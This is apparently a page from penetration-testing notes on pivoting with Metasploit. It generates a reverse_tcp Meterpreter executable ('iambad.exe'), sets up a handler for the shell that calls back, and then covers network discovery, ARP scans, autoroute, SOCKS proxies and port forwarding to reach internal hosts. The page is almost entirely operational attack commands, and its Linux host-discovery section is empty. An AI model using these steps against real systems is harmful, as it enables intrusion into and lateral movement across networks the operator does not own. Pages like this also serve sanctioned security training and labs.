Pivoting

1. Meterpreter session

Exploitation done with metasploit

We already have the meterpreter session

Explotation not done with metasploit:

First generate the executable payload

./msfpayload windows/meterpreter/reverse_tcp lhost={My IP} lport={port} X > /tmp/iambad.exe

Then we copy the executable payload in victim machine

After that in our machine we execute metasploit:

msf > use exploit/multi/handler

msf exploit(handler) > set payload windows/meterpreter/reverse_tcp

set lhost {My IP}

set lport {Port we selected on payload}

run

Then we run payload in victim machine and in our machine we should have the meterpreter session.

2. Network Interface Discovery

Once we compromise the victim machine we can discover new network interfaces.

Linux:

ip a

hostname -I

Windows:

ipconfig

arp -a

3. Hosts Discovery

Metasploit payloads to discover new hosts:

Linux:

Windows:

meterpreter > run post/windows/gather/arp_scanner RHOSTS=7.7.7.0/24 (Here we put 7.7.7.0 because with have found a new network interface in 7.7.7.14 and we want to scan all the range to discover new machines)

Manual hosts discovery (Like in "Methodology w/ Chisel" section)

4. Pivoting

Autoroute

Once we discover a new network interface we need to run autoroute in the meterpreter session.

Example: We discover 7.7.7.11 from the prevouse hosts scan and we need to add a rule to get access to the machines on that range

meterpreter > run autoroute -s 7.7.7.0/24

route add 3.3.3.0 255.255.255.0

or a more simple approach:

use multi/manage/autoroute

set session 1

exploit

Then we can run meterpreter > run autoroute -p to see the active routing table

First Pivot

First of all we put the meterpreter session on background:

background

Then we start the proxy server:

msf > use auxiliary/server/socks4a

set srvhost 127.0.0.1

exploit -j

Then to execute another exploit against the new machine we type "back" and we execute the payload we want against the new machine.

Second Pivot

First of all we put the meterpreter session on background:

background

Then we start the proxy server:

msf > use auxiliary/server/socks4a

set srvhost {My IP}

set srvport 777 (Here we need to select another port, the default port is 1080 like with chisel, but is active so we select another one, here we can follow the same port selection as the port selection in "Methodology w/ Chisel")

run

Then to execute another exploit against the new machine we type "back" and we execute the payload we want against the new machine.

Then to run other tools we need to add the corresponding proxies created with Metasploit in Proxychains config file, here we follow the same methodology as in "Methodology w/ Chisel" section.

5. Port Forwarding

Also if we want to do port forwarding:

portfwd add -L 127.0.0.1 -l 443 -r 3.3.3.3 -p 3389 --> Create a rule to open port 443 on the attack amchine and forward it through the session to target 3.3.3.3 on port 3389

portfwd delete -L 127.0.0.1 -l 443 -r 3.3.3.3 -p 3389 --> Delete rule to open port 443 on the attack amchine and forward it through the session to target 3.3.3.3 on port 3389

portfwd add -l 8161 -p 8161 -r 10.9.20.12

PreviousMeterpreter Commands NextMeterpreter Pass a Shell

Last updated 1 year ago